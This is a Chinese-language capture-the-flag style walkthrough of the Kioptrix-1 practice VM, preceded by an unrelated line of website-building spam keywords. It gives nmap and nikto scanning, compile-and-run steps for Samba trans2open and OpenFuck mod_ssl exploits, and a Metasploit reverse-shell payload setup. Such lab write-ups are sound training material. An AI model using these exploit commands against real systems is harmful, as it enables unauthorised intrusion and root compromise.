成都建立网站的公司,专业做网站的顺德公司,青海建设信用信息服务网站,wordpress设置前言
靶机#xff1a;kioptrix-1#xff0c;IP地址为192.168.1.104
攻击#xff1a;kali#xff0c;IP地址为192.168.1.16
都采用虚拟机#xff0c;网卡为桥接模式 文章中涉及的靶机#xff0c;来源于vulnhub官网#xff0c;想要下载#xff0c;可自行访问官网下载kioptrix-1IP地址为192.168.1.104
攻击kaliIP地址为192.168.1.16
都采用虚拟机网卡为桥接模式 文章中涉及的靶机来源于vulnhub官网想要下载可自行访问官网下载或者通过下方链接下载https://pan.quark.cn/s/1f8bfb170c6d 主机发现
使用arp-scan -l或netdiscover -r 192.168.10.1/24扫描
也可以使用nmap等工具进行 信息收集
使用nmap扫描端口 对于后续的目录爆破等因为我个人测试过所以发现网站的目录无价值进而直接搜索版本漏洞进行测试
smb漏洞寻找并利用
使用searchsploit
前面直接发现139端口开启并且nmap扫描出的是sam服务
那么使用smbclient尝试连接看能否有东西产出
如图并未把版本揭示那么我对于漏洞的使用缺失重要的一块 更换工具采用github上的一个项目进行测试https://github.com/amitn322/smb-version/blob/master/samba_version.py
下载到kali中然后执行脚本即可
python2 smbversion.py -s 192.168.1.104使用searchsploit进行测试发现对应的漏洞只有一个可用于继续下一步对于.rb因为是msf特有的所以暂不考虑 查看10.c文件给出了用法 那么直接进行编译即可
gcc 10.c -o exp编译成功直接执行上面的用法针对单个ip即可
./exp -b 0 -v 192.168.1.104执行后提权至root 使用msf
把上面作为节点这里是新的
这里还是要检测smb服务的版本这里借助整个msf作为使用
使用下面命令启动msf并搜索对应的模块
msfconsole
search type:auxiliary smb version detection那么使用该模块命令如下
msf6 use 0
msf6 auxiliary(scanner/smb/smb_version) optionsmsf6 auxiliary(scanner/smb/smb_version) set rhosts 192.168.1.104
msf6 auxiliary(scanner/smb/smb_version) set rport 139
msf6 auxiliary(scanner/smb/smb_version) optionsmsf6 auxiliary(scanner/smb/smb_version) run执行后会看到对应的版本信息 通过版本在msf中搜索可执行漏洞这里注意漏洞都是同一种trans2open只是操作系统不同这里靶机为linux操作系统所以根据操作系统去选择
search type:exploit samba 2.2use 2
optionsset rhost 192.168.1.104
//端口默认目标的是139这里需要设置一个payload进行监听反弹shell所以需要设置linux的监听
set payload linux/x86/shell/reverse_tcp
//脚本很多选择其中一个即可这时候执行等待缓冲区溢出的爆破一会即可发现反弹成功 web应用漏洞寻找利用
在之前使用nmap扫描时确定443端口服务的版本mod_ssl 2.8.4尝试进行搜索了一下发现有版本范围内的一个漏洞openfuck
searchsploit mod_ssl 2.8.4再使用nikto测试发现也是有提到可能存在
nikto -h 192.168.1.104测试直接使用remote buffer overflow这个是我个人习惯采用最新版本。
查看这个c文件其中有用法以及条件 那么就执行安装后然后再编译
apt-get install libssl-dev
gcc -o openfuck 47080.c -lcrypto执行编译后的openfuck查看帮助提供用法
./openfuck大概用法就是
./openfuck 192.168.1.104 [box] 443向下翻找发现与前面nmap扫描出的443端口的服务版本redhat中间件版本apache 1.3.20对应的有两个 测试这两个即可
./openfuck 192.168.1.104 0x6a 443./openfuck 192.168.1.104 0x6b 443这里经过测试两个发现都是提示超时 可能这里无法利用不过查看了网上的wp发现可以利用这让我陷入深思所以暂且到这里等我搞清楚会发布
总结
该靶机考察以下几点
对于存在的smb服务要能够识别出版本信息也就是信息收集这样才能为下一步确定有无版本信息做铺垫善于使用searchsploit这个是调用一个漏洞库中的信息当然对于漏洞库也不要仅限于一个多个漏洞库去搜索可能这个没有那个会有对于给出的poc、c文件等要会编译并复现经常查看源文件对于msf这个强大的工具要会使用至少要知道一些简单的用法
主要考察的就是对于服务的版本历史漏洞的复现以及利用